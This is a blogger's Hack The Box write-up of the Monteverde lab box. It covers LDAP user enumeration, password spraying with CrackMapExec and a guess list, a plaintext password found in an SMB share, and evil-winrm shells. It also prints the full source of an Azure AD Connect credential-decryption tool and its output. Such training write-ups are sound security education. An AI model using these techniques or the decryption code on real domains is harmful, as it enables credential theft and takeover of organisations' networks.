23rd November 2020
Hack The Box Write Up Monteverde by T13nn3s

Hack The Box Write-Up Monteverde – 10.10.10.172

They might call it the cloud but it is, in fact, just someone else’s computer.

Mark Russinovich

About Monteverde

In this post, I’m writing a write-up for the machine Monteverde from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Monteverde is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.

Foothold
After the portscan, I discovered that this box is the Domain Controller in the forest MEGABANK.local. Through the enumeration of the LDAP Protocol, I discovered several user accounts. With the Nmap LDAP scripts, I found the last login date and I ended up with three recent used accounts AAD_987d7f2f57d2, mhope and SABatchJobs. I found myself creating a wordlist with easy-to-guess passwords and with a brute-force attack on these accounts with CrackMapExec, I managed to get the password of the user SABatchJobs.

User
The user account SABatchJobs has the permissions to read the contents of the home directory of the user mhope. This directory contains a file, named azure.xml. This file contains the password for the user account mhope. As mhope has permission to create a WinRM session to this box, I have created an shell with evil-winrm to grab the user flag.

Root
In the enumeration to gain privilege escalation, I found out that the user mhope is a member of the Azure Admins group. This makes mhope Azure Administrator. As this box has the Azure AD Connect installed and there is a known vulnerability in this AAD version, which gives the possibility to decrypt the Administrator password from the SQL Database. I downlaoded the exploit, ran the exploit and with the decrypted Administrator password I was able to gain access to this box and read the root flag.

Machine Info

Hack The Box Monteverde Machine Info
Hack The Box Monteverde Machine IP and maker

Recon

Portscan

As always I start the enumeration with a portscan.

~$ nmap -sC -sV -oA ./nmap/monteverde.txt 10.10.10.172

Output:

Scanned at 2020-01-20 22:46:17 CET for 340s                                                                                                   
Not shown: 989 filtered ports                                                                                                                 
PORT     STATE SERVICE       VERSION                                                                                                          
53/tcp   open  domain?                                                                                                                        
| fingerprint-strings:                                                                                                                        
|   DNSVersionBindReqTCP:                                                                                                                     
|     version                                                                                                                                 
|_    bind                                                                                                                                    
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-01-20 20:57:22Z)                                                   
135/tcp  open  msrpc         Microsoft Windows RPC                                                                                            
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                    
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)                
| ssl-date:                                                                                                                                   
|_  ERROR: Unable to obtain data from the target                                                                                              
445/tcp  open  microsoft-ds?                                                                                                                  
464/tcp  open  kpasswd5?                                                                                                                      
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                              
636/tcp  open  tcpwrapped                                                                                                                     
| ssl-date:                                                                                                                                   
|_  ERROR: Unable to obtain data from the target                                                                                              
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)                
| ssl-date:                                                                                                                                   
|_  ERROR: Unable to obtain data from the target                                                                                              
3269/tcp open  tcpwrapped                                                                                                                     
| ssl-date:                                                                                                                                   
|_  ERROR: Unable to obtain data from the target                                                                                              
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/20%Time=5E261FCD%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -49m27s
| nbstat: 
|_  ERROR: Name query failed: TIMEOUT
| smb-os-discovery: 
|_  ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-security-mode: 
|_  ERROR: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-01-20T20:59:53
|_  start_date: N/A
Final times for host: srtt: 243334 rttvar: 153575  to: 857634

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
NSE: Starting runlevel 2 (of 3) scan.
NSE: Starting runlevel 3 (of 3) scan.
NSE: Starting clock-skew.
NSE: Finished clock-skew.
Read from /usr/bin/../share/nmap: nmap-payloads nmap-service-probes nmap-services.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 340.57 seconds

User enumeration (enum4linux)

Let’s start with enum4linux . I invoked this command:

~$ enum4linux 10.10.10.172
...
 ============================= 
|    Users on 10.10.10.172    |
 ============================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2       Name: AAD_987d7f2f57d2  Desc: Service account for the Synchronization 
Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos       Name: Dimitris Galanos  Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope  Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary        Name: Ray O'Leary       Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs       Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan        Name: Sally Morgan      Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata        Name: svc-ata   Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec      Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp     Name: svc-netapp        Desc: (null)
...

...
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d] 
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
...

...
[+] Getting domain group memberships:                                                                                                         
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.                                      
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos                                                                                     
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.                                      
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.                                      
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
...

As the results is showing, there are some usernames discovered. First, I put these usernames in a separate file, with the name usernames.txt

I have created a short drawing to get the bigger picture:

  • Trading (group)
    • dgalanos (member)
  • Operations (group)
    • smorgan (member)
  • HelpDesk (group)
    • roleary (member)
  • Azure Admins (group)
    • Administrator (member)
    • AAD_987d7f2f57d2 (member)
    • mhope (member)

And some service accounts:

  • svc-ata
  • svc-bexec
  • svc-netapp

Last but not least, an Azure Sync account. Because the name suggests so. ‘AAD’ usually stands for Azure Active Directory :

  • AAD_987d7f2f57d2

With this information, I learned that there is probably an AAD Sync to Azure. I do not know if I have to use this information, but I need to keep this in mind.

User logondate enumeration

An active user account generally contains more usable data than an inactive user account. Through Kerberos, I first tried to obtain this information, but I was unsuccessful. I try it via LDAP. Nmap has some useful scripts for enumeration through LDAP.

~$ nmap -p 389 --script ldap-search --script-args 'ldap.qfilter=users,ldap.attrib={sAMAccountName, lastlogon}' 10.10.10.172
PORT    STATE SERVICE                                                                                                                         
389/tcp open  ldap                                                                                                                            
| ldap-search:                                                                                                                                
|   Context: DC=MEGABANK,DC=LOCAL; QFilter: users; Attributes: sAMAccountName,lastlogon                                                       
|     dn: CN=Guest,CN=Users,DC=MEGABANK,DC=LOCAL                                                                                              
|         lastLogon: Never                                                                                                                    
|         sAMAccountName: Guest                                                                                                               
|     dn: CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL                                                                            
|         lastLogon: 2020-01-21T16:21:25+00:00
|         sAMAccountName: MONTEVERDE$
|     dn: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
|         lastLogon: 2020-01-21T15:23:33+00:00
|         sAMAccountName: AAD_987d7f2f57d2
|     dn: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL 
|         lastLogon: 2020-01-21T18:07:51+00:00
|         sAMAccountName: mhope
|     dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
|         lastLogon: 2020-01-21T16:53:24+00:00
|         sAMAccountName: SABatchJobs
|     dn: CN=svc-ata,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
|         lastLogon: Never
|         sAMAccountName: svc-ata
|     dn: CN=svc-bexec,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
|         lastLogon: Never
|         sAMAccountName: svc-bexec 
|     dn: CN=svc-netapp,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
|         lastLogon: Never
|         sAMAccountName: svc-netapp
|     dn: CN=Dimitris Galanos,OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
|         lastLogon: Never
|         sAMAccountName: dgalanos
|     dn: CN=Ray O'Leary,OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
|         lastLogon: Never
|         sAMAccountName: roleary
|     dn: CN=Sally Morgan,OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
|         lastLogon: Never
|_        sAMAccountName: smorgan

The output is showing all the user accounts with the last login date, there are three users who are currently active in use. For my further enumeration, I focus on these three user accounts.

SamAccountNamelastlogon
AAD_987d7f2f57d22020-01-21T15:23:33+00:00
mhope2020-01-21T18:07:51+00:00
SABatchJobs2020-01-21T16:53:24+00:00
Table with the most recent last logon date’s

Intrusion

Password guessing game

I’ve got now three usernames, but no passwords. I tried in several ways to get a password, but I have not succeeded. Based on the information I have until now, I can create a small wordlist with very known passwords. When a lazy administrator has configured the user accounts with the passwords maybe I got a chance to brute-force one of the user accounts. So, it turns out that I’ve entered a password guessing game…

I’ve built a list with easy-to-guess passwords and add these passwords to the ‘passwords.txt’ file. This is my easy-to-guess password list:

password.txt

[email protected]
 [email protected]
 mhope
 epohm
 Mhope
 Mh0pe
 user123
 megabank
 Megabank
 [email protected]
 [email protected]
 AAD_987d7f2f57d2
 2d75f2f7d789_DAA
 SABatchJobs
 SABatchJobs
 hope
 Hope
 h0pe
 H0pe
 h0p3
 H0p3
 hope123
 Hope123
 welcome
 Welcome
 welcome!1
 Welcome!1
 [email protected]
 [email protected]
 987d7f2f57d2
 AAD_987d7f2f57d2
 abc123
 12345678
 1234567
 [email protected]
 [email protected]
 qwerty
 monkey
 letmein
 dragon
 111111
 baseball
 iloveyou
 trustno1
 sunshine
 master
 123123
 shadow
 Ashley
 football
 Michael
 ninja
 mypassword
 Mypassword
 pass123
 Pass123
 password
 Password
 password123
 Passwod123
 password1
 Password1
 [email protected]!1
 [email protected]!
 [email protected]!1
 [email protected]
 [email protected]
 [email protected]

Ok, now I can start guessing with CrackMapExec. I have added the three usernames to my scope. Let’s start the guessing game.

~$ crackmapexec smb 10.10.10.172 -u SABatchJobs -p passwords.txt
CME          10.10.10.172:445 MONTEVERDE      [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME          10.10.10.172:445 MONTEVERDE      [+] MEGABANK\SABatchJobs:SABatchJobs 

And after a while I managed to get an password. The Administrator who has configured this account was very lazy.

Enumerate shares

I’ve tried to get a shell with the tool evil-winrm but received a WinRM::WinRMAuthorizationError error message. So, the next step is to try to enumerate further through the shares.

~$ smbmap -u SABatchJobs -p SABatchJobs -H 10.10.10.172                                                                                  
[+] Finding open SMB ports....                                                                                                                
[+] User SMB session established on 10.10.10.172...                                                                                           
[+] IP: 10.10.10.172:445        Name: 10.10.10.172                                                                                            
        Disk                                                    Permissions     Comment                                                       
        ----                                                    -----------     -------                                                       
        ADMIN$                                                  NO ACCESS       Remote Admin                                                  
        .                                                                                                                                     
        dr--r--r--                0 Fri Jan  3 13:43:36 2020    .                                                                             
        dr--r--r--                0 Fri Jan  3 13:43:36 2020    ..                                                                            
        azure_uploads                                           READ ONLY                                                                     
        C$                                                      NO ACCESS       Default share                                                 
        E$                                                      NO ACCESS       Default share                                                 
        .                                                                                                                                     
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    InitShutdown                                                                  
        fr--r--r--                5 Mon Jan  1 00:19:32 1601    lsass                                                                         
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    ntsvcs                                                                        
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    scerpc                                                                        
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-3b4-0                                          
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    epmapper                                                                      
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-1f0-0                                          
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    LSM_API_service                                                               
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    eventlog                                                                      
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-4b4-0                                          
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    atsvc                                                                         
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-6b8-0                                          
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-28c-0                                          
        fr--r--r--                4 Mon Jan  1 00:19:32 1601    wkssvc
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-28c-1                                   [7/676]
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    RpcProxy\49669
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    ab7a144f9d8123c3
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    RpcProxy\593
        fr--r--r--                4 Mon Jan  1 00:19:32 1601    srvsvc
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    spoolss
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-b78-0
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    netdfs
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    vgauth-service
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    W32TIME_ALT
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-278-0
        fr--r--r--                3 Mon Jan  1 00:19:32 1601    SQLLocal\MSSQLSERVER
        fr--r--r--                2 Mon Jan  1 00:19:32 1601    sql\query
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-bc8-0
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    PSHost.132241953372355013.5932.DefaultAppDomain.wsmprovhost
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    CPFATP_6128_v4.0.30319
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    PSHost.132241953566831249.6128.DefaultAppDomain.miiserver
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    GoogleCrashServices\S-1-5-18
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    GoogleCrashServices\S-1-5-18-x64
        fr--r--r--                1 Mon Jan  1 00:19:32 1601    Winsock2\CatalogChangeListener-be4-0
        IPC$                                                    READ ONLY       Remote IPC
        .                                                   
        dr--r--r--                0 Thu Jan  2 23:05:27 2020    .
        dr--r--r--                0 Thu Jan  2 23:05:27 2020    ..
        NETLOGON                                                READ ONLY       Logon server share 
        .                                                   
        dr--r--r--                0 Thu Jan  2 23:05:27 2020    .
        dr--r--r--                0 Thu Jan  2 23:05:27 2020    ..
        dr--r--r--                0 Thu Jan  2 23:05:27 2020    MEGABANK.LOCAL
        SYSVOL                                                  READ ONLY       Logon server share 
        .                                                   
        dr--r--r--                0 Fri Jan  3 14:12:48 2020    .
        dr--r--r--                0 Fri Jan  3 14:12:48 2020    ..
        dr--r--r--                0 Fri Jan  3 14:15:23 2020    dgalanos
        dr--r--r--                0 Fri Jan  3 14:41:18 2020    mhope
        dr--r--r--                0 Fri Jan  3 14:14:56 2020    roleary
        dr--r--r--                0 Fri Jan  3 14:14:28 2020    smorgan
        users$                                                  READ ONLY

I’ve established a connection to the users$ share and found in the user account directory of the user account ‘mhope’ an interesting file called azure.xml.

smb: \mhope\> pwd
Current directory is \\10.10.10.172\users$\mhope\
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 14:41:18 2020
  ..                                  D        0  Fri Jan  3 14:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 14:40:23 2020

                524031 blocks of size 4096. 519955 blocks available

I downloaded this file to my localhost and checked his contents.

~$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">[email protected]$</S>
    </Props>
  </Obj>
</Objs>

There is a password listed in this file [email protected]$. As this file is listed in the directory of the user account mhope. I assume that this is the password of the account mhope. With the tool evil-winrm, I’ve created a shell to the box. Now I can grab the user flag.

~$ evil-winrm -u mhope -p [email protected]$ -i 10.10.10.172
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
4961976bd7d8f4eeb2ce3705e2f212f2

Privilege Escalation

Enumeration

I have a shell as the user ‘mhope’. I want to enumerate further to get Administrator privileges. As I know that this box has an AAD Sync with Azure, there has to be an Azure Admins group listed on this box. I invoked the command below to get the members of this group:

*Evil-WinRM* PS C:\Users\mhope\Documents> net group "azure admins" /domain
Group name     Azure Admins
Comment        

Members

-------------------------------------------------------------------------------
AAD_987d7f2f57d2         Administrator            mhope                    
The command completed successfully.

And it seems that the user account mhope is a member of the Azure Admins, which makes this user account an Azure Admin! For sure, I have checked if that Microsoft Azure Directory Connect is installed on the server. Further, I see that Windows Defender Advanced Threat Protection also is installed. So, there’s antivirus software installed out there that I need to keep an eye on.

*Evil-WinRM* PS C:\Program Files> ls
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect                                                     
                                                                                                                                              
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader                                            
                                                                                                                                              
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent                                                 
                                                                                                                                              
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync

The Microsoft Azure AD Sync needs to have Administrator privileges to work properly, the Administrator-account credentials need to be stored somewhere. After some searching on Google, I found an interesting article (https://blog.xpnsec.com/azuread-connect-for-redteam/) and a great video(48min) on YouTube (https://www.youtube.com/watch?v=JEIR5oGCwdg).

Azure AD Connect Database Exploit

With the information I found online, I searched further on the internet for an article ( https://vbscrub.video.blog/2020/01/14/azure-ad-connect-database-exploit-priv-esc/ ) which contains a VBscript:

Imports Microsoft.DirectoryServices.MetadirectoryServices.Cryptography
Imports System.Data.SqlClient
Imports System.Xml
Module MainModule
 
    Sub Main()
        Try
            Console.WriteLine(Environment.NewLine & "======================" & Environment.NewLine &
                              "AZURE AD SYNC CREDENTIAL DECRYPTION TOOL" & Environment.NewLine &
                              "Based on original code from: https://github.com/fox-it/adconnectdump" & Environment.NewLine &
                              "======================" & Environment.NewLine)
 
            Dim SqlConnectionString As String = "Data Source=(LocalDB)\\.\\ADSync;Initial Catalog=ADSync;Connect Timeout=20"
 
            If My.Application.CommandLineArgs.Count > 0 AndAlso String.Compare(My.Application.CommandLineArgs(0), "-FullSql", True) = 0 Then
                SqlConnectionString = "Server=LocalHost;Database=ADSync;Trusted_Connection=True;"
            End If
 
            Dim KeyId As UInteger
            Dim InstanceId As Guid
            Dim Entropy As Guid
            Dim ConfigXml As String
            Dim EncryptedPasswordXml As String
 
            Using SqlConn As New SqlConnection(SqlConnectionString)
                Try
                    Console.WriteLine("Opening database connection...")
                    SqlConn.Open()
                    Using SqlCmd As New SqlCommand("SELECT instance_id, keyset_id, entropy FROM mms_server_configuration;", SqlConn)
                        Console.WriteLine("Executing SQL commands...")
                        Using Reader As SqlDataReader = SqlCmd.ExecuteReader
                            Reader.Read()
                            InstanceId = DirectCast(Reader("instance_id"), Guid)
                            KeyId = CUInt(Reader("keyset_id"))
                            Entropy = DirectCast(Reader("entropy"), Guid)
                        End Using
                    End Using
                    Using SqlCmd As New SqlCommand("SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'", SqlConn)
                        Using Reader As SqlDataReader = SqlCmd.ExecuteReader
                            Reader.Read()
                            ConfigXml = CStr(Reader("private_configuration_xml"))
                            EncryptedPasswordXml = CStr(Reader("encrypted_configuration"))
                        End Using
                    End Using
                Catch Ex As Exception
                    Console.WriteLine("Error reading from database: " & Ex.Message)
                    Exit Sub
                Finally
                    Console.WriteLine("Closing database connection...")
                    SqlConn.Close()
                End Try
                Try
                    Console.WriteLine("Decrypting XML...")
                    Dim CryptoManager As New KeyManager
                    CryptoManager.LoadKeySet(Entropy, InstanceId, KeyId)
                    Dim Decryptor As Key = Nothing
                    CryptoManager.GetActiveCredentialKey(Decryptor)
                    Dim PlainTextPasswordXml As String = Nothing
                    Decryptor.DecryptBase64ToString(EncryptedPasswordXml, PlainTextPasswordXml)
                    Console.WriteLine("Parsing XML...")
                    Dim Domain As String = String.Empty
                    Dim Username As String = String.Empty
                    Dim Password As String = String.Empty
                    Dim XmlDoc As New XmlDocument
                    XmlDoc.LoadXml(PlainTextPasswordXml)
                    Dim XmlNav As XPath.XPathNavigator = XmlDoc.CreateNavigator
                    Password = XmlNav.SelectSingleNode("//attribute").Value
                    XmlDoc.LoadXml(ConfigXml)
                    XmlNav = XmlDoc.CreateNavigator
                    Domain = XmlNav.SelectSingleNode("//parameter[@name='forest-login-domain']").Value
                    Username = XmlNav.SelectSingleNode("//parameter[@name='forest-login-user']").Value
                    Console.WriteLine("Finished!" &
                                      Environment.NewLine & Environment.NewLine &
                                      "DECRYPTED CREDENTIALS:" & Environment.NewLine &
                                      "Username: " & Username & Environment.NewLine &
                                      "Password: " & Password & Environment.NewLine &
                                      "Domain: " & Domain & Environment.NewLine)
                Catch ex As Exception
                    Console.WriteLine("Error decrypting: " & ex.Message)
                End Try
            End Using
        Catch ex As Exception
            Console.WriteLine("Unexpected error: " & ex.Message)
        End Try
    End Sub
 
End Module

I downloaded the AdDecrypt.exe to my local machine along with the mcrypt.dll file. On the box, I created the folder C:\.enum and uploaded the files to this folder.

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> upload AdDecrypt.exe                                                            
Info: Uploading AdDecrypt.exe to C:\Program Files\Microsoft Azure AD Sync\Bin\AdDecrypt.exe                                                   
                                                                                                                                              
Data: 19796 bytes of 19796 bytes copied                                                                                                       
                                                                                                                                              
Info: Upload successful!                                                                                                                      
                                                                                                                                              
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> upload mcrypt.dll                                                               
Info: Uploading mcrypt.dll to C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll                                                         
                                                                                                                                              
Data: 445664 bytes of 445664 bytes copied                                                                                                     
                                                                                                                                              
Info: Upload successful!  

When the upload was finished. I set the directory C:\Program Files\Microsoft Azure AD Sync\Bin as my working directory and execute this command:

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\.enum\AdDecrypt.exe

And… the script is running and decrypting the Administrator password from the SQL database:

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\.enum\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: [email protected]!
Domain: MEGABANK.LOCAL

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> 

I now have the credentials of the Administrator-account. I can now create an evil-winrm connection:

~$ evil-winrm -u administrator -p [email protected]! -i 10.10.10.172

Grab the root.txt flag and I have rooted this box.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
12909612d25c8dcf6e5a07d1a804a0bc
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Thanks for reading my write-up of Monteverde. I’ve really enjoyed hacking this box. If you like my write-up, please consider spending a respect point, my profile on HTB: https://www.hackthebox.eu/home/users/profile/224856. Many thanks in advance!

Happy hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *